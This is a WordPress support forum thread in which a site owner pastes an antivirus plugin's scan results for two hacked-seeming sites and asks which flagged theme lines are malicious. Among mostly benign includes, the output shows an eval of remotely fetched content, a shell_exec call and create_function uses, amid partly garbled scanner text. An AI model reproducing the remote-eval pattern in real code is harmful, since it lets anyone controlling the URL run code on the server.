WordPress.org

1. ladyguerra
   Member
   Posted 8 months ago #

   I've heard from some people that when they visited two of my sites, they got redirected to another website. I just found this plugin and scanned both sites and some came up red. I would like to know, which ones are false alarms? And which ones are hacker codes? And could I delete these codes?

   Here were my results
   Website 1:
   

   index.php
   <?php	include(TEMPLATEPATH . '/featured.php'); ?> <!-- calli ..
   
   functions.php
   require_once(ABSPATH . 'wp-admin/upgrade-functions.php') ...
   
   archives.php
   <?php include (TEMPLATEPATH . '/pagination.php'); ?>
   
   scripts/timthumb.php
   ... $cache_file_name = $cache_dir . '/' . get_cache_file();
   show_cache_file( $cache_dir, $mime_type );
   $mime_type = finfo_file($finfo, $file);
   line 234 $mime_type = trim(@shell_exec('file -bi $file'));
   line 283 show_cache_file($cache_dir, $mime_type);
   line 287 function show_cache_file($cache_dir) {
   line 289 $cache_file = $cache_dir . '/' . get_cache_file();
   line 321 readfile($cache_file);
   line 329 function get_cache_file () {

   Then the scan for Website 2 shows:
   

   index.php
   line 14 include(TEMPLATEPATH . '/wpzoom-home.php');
   
   header.php
   line 120 <?php include (TEMPLATEPATH . '/searchform.php'); ?>
   
   search.php
   line 58 <?php include (TEMPLATEPATH . '/searchform.php'); ?>
   
   scripts/timthumb.php
   line 25 if( file_exists('timthumb-config.php')) require_once('timthumb-config.php');
   
   line 203 $imgData = base64_decode("R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAA ...
   
   line 203... WXfNa6JCLnWkXplrcBmW+spbwvaVr/cDyg7IoFC2KbYVC2NQ5MQ4ZNao9Ynzjl9ScNYpneb DULB3RP6JuPuaGfuuV4fumf8Puvq ...
   
   line 203... C2NQ5MQ4ZNao9Ynzjl9ScNYpnebnDULB3RP6JuPuaGfuuV4fumf8PuvqFyhYtjdoeFgAADs=");
   
   line 324 if(! is_file($this->cachefile)){
   
   line 331 } else if(is_file($this->cachefile)){ //If it's not a local reque ...
   
   line 440 if(! is_file($lastCleanFile)){
   
   line 720... 'png' && OPTIPNG_ENABLED && OPTIPNG_PATH && @is_file(OPTIPNG_PATH)){
   
   line 735... ng' && PNGCRUSH_ENABLED && PNGCRUSH_PATH && @is_file(PNGCRUSH_PATH)){
   
   line 741 if(is_file($tempfile2)){
   
   line 761 $fp = fopen($tempfile,'r',0,$context);
   
   line 762 file_put_contents($tempfile4, $this->filePrependSecurityBlo ...
   
   line 763 file_put_contents($tempfile4, $fp, FILE_APPEND);
   
   line 764fclose($fp);
   
   line 768 $fh = fopen($lockFile, 'w');
   
   line 776 fclose($fh);
   
   line 779 fclose($fh);
   
   line 816 if(is_file($file)){
   
   line 869 if(! is_file(WEBSHOT_CUTYCAPT)){
   
   line 872 if(! is_file(WEBSHOT_XVFB)){
   
   line 904 if(! is_file($tempfile)){
   
   line 959 if(! is_file($this->cachefile)){
   
   line 963 $fp = fopen($this->cachefile, 'rb');
   
   line 966 $imgType = fread($fp, 3);
   
    line 974 $bytesSent = @fpassthru($fp);
   
   line 975 fclose($fp);
   
   line 979 $content = file_get_contents ($this->cachefile);
   There is no virusView line 1100self::$curlFH = fopen($tempfile, 'w');
   
   There is no virusView line 1107$curl = curl_init($url);
   
   There is no virusView line 1117$curlResult = curl_exec($curl);
   
   There is no virusView line 1118fclose(self::$curlFH);
   
   There is no virusView line 1132$img = @file_get_contents ($url);
   
   There is no virusView line 1146if(! file_put_contents($tempfile, $img)){
   
   There is no virusView line 1163$bytes = @readfile($file);
   
   There is no virusView line 1167$content = @file_get_contents ($file);
   
   wpzoom_admin/admin_functions.php
   There is no virusView line 897include_once(ABSPATH . WPINC . '/rss.php');
   
   widgets/wpzoom-video-widget.php
   There is no virusView line 5add_action('widgets_init', create_function('', 'return register_widget("Video_Widget" ...
   
   ... ce = preg_replace('/[^( -)]*/','', file_get_contents($url));
   
   functions/wpzoom-video.php
   There is no virusView line 225... ce = preg_replace('/[^( -)]*/','', file_get_contents($url));
   
   functions/wpzoom-functions.php
   View line 468eval("?>". file_get_contents($url) . " ");
   
   There is no virus". file_get_contents($url) . " ");&theme=CadabraPress&dir=theme" target="_blank">View line 468eval("?>". file_get_contents($url) . " ");
   
   There is no virus". file_get_contents($url) . " ");There is no virus". file_get_contents($url) . " ");&theme=CadabraPress&dir=theme" target="_blank">
   line 468eval("?>". file_get_contents($url) . " ");&theme=CadabraPress&dir=theme" target="_blank">
   line 533$str = @file_get_contents("http://api.flickr.com/services/rest/?met ...
   
   functions/wpzoom-core.php
   line 53require_once($locale_file);
   
   line 58add_filter('gallery_style', create_function('$a', 'return "
   
    line 123require_once ($functions_path . 'admin_functions.php');

   Help please..

   http://wordpress.org/extend/plugins/antivirus/

2. Michelle Reece
   Member
   Posted 5 months ago #

   I don't know if this is still relevant, but...

   Try http://sitecheck.sucuri.net/scanner/ and http://www.google.com/safebrowsing/diagnostic?site=www.example.com (replace example.com with your website name). They could be false positives (I had the "
   require_once(ABSPATH . 'wp-admin/upgrade-functions.php') on several occasions even though I was clean), but look on blacklisting/scanner sites to make sure.

3. Going2MakeIT
   Member
   Posted 1 week ago #

   Man I am confused :-(, Michelle on performed that on-line scanner,it comes back it say my site it is clean, then I get a alert from antivirus plug-in, say that I might have an virus so which one is telling the truth???

Reply

You must log in to post.